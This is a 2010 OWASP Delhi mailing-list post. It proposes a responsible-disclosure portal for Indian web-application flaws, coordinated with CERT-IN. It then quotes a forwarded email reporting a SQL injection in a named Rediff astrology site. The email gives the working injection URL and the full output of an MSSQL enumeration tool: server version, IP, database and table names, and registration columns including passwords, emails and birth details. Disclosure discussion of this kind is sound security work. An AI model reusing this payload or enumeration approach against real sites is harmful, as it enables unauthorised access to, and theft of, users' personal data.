[Owasp-delhi] Rediff Astrology

Soi, Dhruv dhruv.soi at torridnetworks.com
Wed Jun 16 05:46:30 EDT 2010

That sounds like government supportive lang., seems you have had a good time with them J No offensive though, I like that.

I could better think of collective idea from Subhash’s and Sriram’s post to have a central portal dedicated towards web application breaches and flaws in India, just like WASC (which is for global). The count of vulnerabilities that WASC could build over 10 years for global websites, I am sure, we can build similar database for Indian web applications in around 1yr itself J

We could think of a model where a vuln. is firstly reported to the owner and CERT-IN to show our responsibility for the provider. Thereafter, give some time window to fix the problem. If nothing happens in the window and/or there is no response from the owner, we show our responsibility for the consumer and publish it over the portal.

We can further brainstorm keeping CERT-IN in loop to drive something fruitful. Connect me offline if anyone of you is interested to mature this idea, we can catch up somewhere in NCR, pitch this idea as an OWASP India Project, participate as volunteers, and do something good for owner, consumers and govt.

Cheers!

Dhruv

To: dhruv.soi at owasp.org
Subject: Rediff Astrology

y0,

h0rr1bl3 th4n h0rr0r

Vulnerable Url :

http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Scorpiox%27%20OR%201=convert%28int,@@version%29--

+     -==  MSSQL Information Schema astrology.rediff.com  ==-     +

[ + ] URL : http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzo

diac=Scorpiox'

[ + ] Date: Tue May 18 20:58:26 2010

[ + ] Displaying information about MSSQL host !

[ + ] @@VERSION  :      Microsoft SQL Server  2000 - 8.00.194 (Intel X86)

                        Aug  6 2000 00:57:48

                        Copyright (c) 1988-2000 Microsoft Corporation

                        Standard Edition on Windows NT 5.0 (Build 2195: Service

Pack 4)

[ + ] USER ()          : dbo

[ + ] S_USER ()        : astrology

[ + ] DB_NAME ()       : astro

[ + ] HOST_NAME ()     : ASTROLOGY

[ + ] SERVER_NAME ()   : SEARCHDB

[ + ] SERVER_TYPE ()   : Microsoft-IIS/6.0

[ + ] X-POWERED-By ()  : ASP.NET

[ + ] IP_ADDRESS_INFO  : 202.54.124.173

[ - ] We Can't get number of Databases !

[ ! ] Start dumping database Names !

[ ? ] But first choice number of DB to dump :> 20

[ + ] Displaying list of 20 databases on this MSSQL host !

[ DATABASE: 0 ]        : astro

[ DATABASE: 1 ]        : master

[ DATABASE: 2 ]        : tempdb

[ DATABASE: 3 ]        : model

[ DATABASE: 4 ]        : msdb

[ DATABASE: 5 ]        : pubs

[ DATABASE: 6 ]        : Northwind

[ DATABASE: 7 ]        : travel

[ DATABASE: 8 ]        : travel_int

[ DATABASE: 9 ]        : astro

[ DATABASE: 10 ]        : Jobsearch

[ DATABASE: 11 ]        : astroyogiD

[ DATABASE: 12 ]        : matrimonial

[ DATABASE: 13 ]        : investornew

[ DATABASE: 14 ]        : test

[ ! ] Vulnerability Database is   :  astro

[ + ] Displaying Tables inside DB :> astro

[ ? ] Numbers of Tables To Dispaly ?

[ + ] Specify Numbers   :> 200

[ TABLES: 0 ]          : ALLIANCE_PARTNER_COMMISSION

[ TABLES: 1 ]          : ALLIANCE_PARTNER_MASTER

[ TABLES: 2 ]          : astrolove

[ TABLES: 3 ]          : astroparent

[ TABLES: 4 ]          : CITY

[ TABLES: 5 ]          : COMPLETE_ORDER_DETAIL

[ TABLES: 6 ]          : COMPLETE_SUBSCRIPTION_DETAIL

[ TABLES: 7 ]          : COUNTRY

[ TABLES: 8 ]          : CUSTOMER_CARE_DETAILS

[ TABLES: 9 ]          : CUSTOMER_CARE_MASTER

[ TABLES: 10 ]          : CUSTOMER_PERSON1

[ TABLES: 11 ]          : CUSTOMER_PERSON2

[ TABLES: 12 ]          : CUSTOMER_PERSON3

[ TABLES: 13 ]          : darshtest

[ TABLES: 14 ]          : dtproperties

[ TABLES: 15 ]          : FENGSHUI

[ TABLES: 16 ]          : FRANCHISEE_MASTER

[ TABLES: 17 ]          : idealmate

[ TABLES: 18 ]          : INTERNATIONAL_PARTNER_MASTER

[ TABLES: 19 ]          : NUMEROLOGY

[ TABLES: 20 ]          : ORDER_DETAILS

[ TABLES: 21 ]          : ORDER_MASTER

[ TABLES: 22 ]          : ORDER_REMARKS

[ TABLES: 23 ]          : ORDERS

[ TABLES: 24 ]          : p1

[ TABLES: 25 ]          : p3master

[ TABLES: 26 ]          : PALMISTRY

[ TABLES: 27 ]          : PAYMENT_METHOD_MASTER

[ TABLES: 28 ]          : PROBLEM_ANSWER

[ TABLES: 29 ]          : PROBLEM_CATEGORY

[ TABLES: 30 ]          : REGISTRATION

[ TABLES: 31 ]          : SHIPPING_DETAILS

[ TABLES: 32 ]          : SPCFIC_ANLYS

[ TABLES: 33 ]          : SUBSCRIBER_DETAILS

[ TABLES: 34 ]          : SUBSCRIBER_MASTER

[ TABLES: 35 ]          : SUBSCRIBER_REGISTRATION

[ TABLES: 36 ]          : SUBSCRIBER_TRANSACTION

[ TABLES: 37 ]          : SUBSCRIPTION_DETAILS

[ TABLES: 38 ]          : SUBSCRIPTION_MASTER

[ TABLES: 39 ]          : sysconstraints

[ TABLES: 40 ]          : syssegments

[ TABLES: 41 ]          : test

[ TABLES: 42 ]          : USER_ASTROLOGER_PRODUCT_TRANSACTION

[ TABLES: 43 ]          : zodiac

[ + ] Done !

[ + ] Start dumping all Columns from table :> REGISTRATION

[ ? ] Numbers of Columns To Display ?

[ + ] Specify Numbers    :> 50

[ + ] Displaying 50 Columns inside Table: REGISTRATION and Database: astro

[ COLUMNS : REGISTRATION ] 0 ]         : FRANCHISEE_ID

[ COLUMNS : REGISTRATION ] 1 ]         : PARTNER_ID

[ COLUMNS : REGISTRATION ] 2 ]         : REGISTRATION_ADDRESS

[ COLUMNS : REGISTRATION ] 3 ]         : REGISTRATION_BIRTH_COUNTRY

[ COLUMNS : REGISTRATION ] 4 ]         : REGISTRATION_BIRTH_DATE

[ COLUMNS : REGISTRATION ] 5 ]         : REGISTRATION_BIRTH_PLACE

[ COLUMNS : REGISTRATION ] 6 ]         : REGISTRATION_BIRTH_TIME_HOUR

[ COLUMNS : REGISTRATION ] 7 ]         : REGISTRATION_BIRTH_TIME_MINUTES

[ COLUMNS : REGISTRATION ] 8 ]         : REGISTRATION_CELL_NO

[ COLUMNS : REGISTRATION ] 9 ]         : REGISTRATION_COUNTRY

[ COLUMNS : REGISTRATION ] 10 ]         : REGISTRATION_DATE

[ COLUMNS : REGISTRATION ] 11 ]         : REGISTRATION_EMAIL_ID

[ COLUMNS : REGISTRATION ] 12 ]         : REGISTRATION_FIRSTNAME

[ COLUMNS : REGISTRATION ] 13 ]         : REGISTRATION_GENDER

[ COLUMNS : REGISTRATION ] 14 ]         : REGISTRATION_ID

[ COLUMNS : REGISTRATION ] 15 ]         : REGISTRATION_IP

[ COLUMNS : REGISTRATION ] 16 ]         : REGISTRATION_LASTNAME

[ COLUMNS : REGISTRATION ] 17 ]         : REGISTRATION_PASSWORD

[ COLUMNS : REGISTRATION ] 18 ]         : REGISTRATION_TELEPHONE_NO

[ COLUMNS : REGISTRATION ] 19 ]         : REGISTRATION_USERNAME

[ ! ] Done !

[ ! ] All information was recorded in astrology.rediff.com.txt file !

[ 1 ] : Return to Tables  !

[ 2 ] : Return to Columns !

[ ? ] : Oprion :>

Thanks & Regards